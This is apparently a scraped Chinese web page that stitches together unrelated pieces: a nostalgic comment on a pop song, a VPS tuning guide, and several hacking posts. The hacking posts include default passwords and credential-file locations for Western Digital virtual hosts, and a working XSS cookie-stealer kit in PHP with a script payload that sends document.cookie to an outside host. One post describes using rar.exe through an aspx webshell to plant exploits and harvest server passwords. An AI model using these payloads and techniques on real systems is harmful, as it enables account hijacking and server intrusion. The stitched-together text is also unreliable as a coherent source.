吴奇隆的祝你一路顺风写的确实好。经典、怀念
记得那时候吴奇隆都哭了都。现在才明白含义!
每单听起这首歌的时候就感觉有好多话要对朋友说!
朋友，你现在过的好吗?

当前思路也可用于其他虚拟主机。

说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306
就算修改了也是可以读取ini文件得到加密密码的
mysql 的root密码在安装过程中会提示是否修改 默认也是为root3306 或者 123456

在这些服务安装的过程中西部数码给这些服务都是低权限运行的。所以无法使用一些webshell集成的s-u EXP来提权

值得一说的是在该虚拟主机并未删除Wscript.Shell组建。不过很杯具的是没有找到执行目录.
该虚拟主机默认软件安装路径：d:\SOFT_PHP_PACKAGE\ 在该目录下setup.ini配置文件中记录着mysql root 密码 site.xml 记录着网站配置信息（3.0以前的版本）
3.0版本现在集成到了access数据库中 也是存放在 默认安装路径下的iistool.dat 文件中 用户权限也是 users组可读 这样我们就可以利用webshell获取到各种信息了（这个其实是一个access数据库文件 他的连接密码为：www@west263@cn ）

来自: www.91ri.org

以下是在LNMP环境下设置，其他环境可能稍有不同。

1.Mysql禁用日志（可选，如果你觉得日志对你来说没有用，建议禁用）
/etc/my.cnf
把这两行注释掉
#log-bin=mysql-bin
#binlog_format=mixed

2.修改nginx的进程数量
/usr/local/nginx/conf/nginx.conf
一般不用修改，如果你的VPS给了你双核，可以修改worker_processes值为2

3.修改php-cgi的进程数量
/usr/local/php/etc/php-fpm.conf
修改12
一般256M内存，大概可以设为12个。

4.修改最大同时连接文件数
系统默认是1024，最好改大些
使用 ulimit -a 可以查看当前系统的所有限制值，使用ulimit -n 可以查看当前的最大打开文件数。
新装的linux默认只有1024，当作负载较大的服务器时，很容易遇到error: too many open files。因此，需要将其改大。
使用 ulimit -n 65535 可即时修改，但重启后就无效了。（注ulimit -SHn 65535 等效 ulimit -n 65535，-S指soft，-H指hard)
有如下三种修改方式：
1.在/etc/rc.local 中增加一行 ulimit -SHn 65535
2.在/etc/profile 中增加一行 ulimit -SHn 65535
3.在/etc/security/limits.conf最后增加如下两行记录
* soft nofile 65535
* hard nofile 65535
具体使用哪种，试试哪种有效吧，我在 CentOS中使用第1种方式无效果，使用第3种方式有效果，而在Debian中使用第2种有效果

5.更改ssh端口
/etc/ssh/sshd
默认为22 建议修改
建议先增加一个端口号，待确认可以连接后，再删除22端口

6.修改ROOT密码
用ROOT账号登录SSH后，输入passwd
然后再输入二次新密码
建议设为9位数以上，英文数字字符组合

1.支持PHP 网页

2.网站存在xss的脆弱的地方。

 vb.php为存放cookie的网页

PHP Code:
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther – Designed and programmed by R00t[ATI]</title>
</head>

<body bgcolor=”#C0C0C0″>

<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”>&nbsp;</p>

</body> 

documents.php取得cookie的网页
PHP Code:
    <?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:    “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(“Location: http://ashker.Net”);

?>   

Vb.php文件是用来收集Cookie和其他信息。

documents.php文件用于抓取资料如： IP地址，用户代理和cookie 。

documents.php是抓住文件的Cookie使用的方法

documents.php?c=”+document.cookie;

如下例子
:
Code:
Code:

http://www.ashker.Net/vulnerable_page.php?vulnerable_method=<script>document.location=”http://ashker.net/documents.php?c=”+document.cookie;</script>

前段时间比较变态，连续日了几个站，还他妈的都是星外。

所以在研究提权过程中叶发现了一些的问题。 随着星外的更新。

对提权来说也不是件容易的事。特别是找可读可写的目录 有时候找到了可读可写的目录也不一定能执行。也是提示无权限 再说服务器虽然没有了360，但是还有麦咖啡跟一流监控呢。

未加入过滤行列的程序直接删了都。 大家都知道，在C:\Program Files的文件夹有一个winrar的目录文件夹。

先用aspx大马试探下rar能否执行。

命令是:C:\Program Files\Winrar\rar.exe或unrar.exe 如果能够正被执行的说明还是有希望的。

在本地创建一个rar的压缩包。包含星外exp、cmd。上传到网站的根目录。接着就是查找可写目录了。
到了这里有的人可能会说。找到了可写目录不就可执行了吗。
但有的情况可能你没有遇到过，明明提示上传成功了的，却找不到了，有时会在执行的时会还是提示没有权限。
接着在aspx上执行rar.exe。释放文件 例如:x d:\freehost\wwwroot\xx.rar C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index

这样rar的文件就被释放到了media index的目录里。因为是在服务器上执行的。杀软不监控。
接着就到aspx那执行去了。顺利拿到密码。
现在的星外多了一个安全模式。像网上所说的，编辑web.config文件。我都弄了N次了。没一次是好的。。可以说基本突破不了
我也尝试过制作一个自解压文件，直接运行自解压，让自解压运行已经配置好的参数程序。但是在虚拟主机下不成功。还是需要network权限的
如果能够在rar格式解压并运行指定程序的话，那不是就是rar漏洞了吗
如果有这方面的资料，欢迎与我交流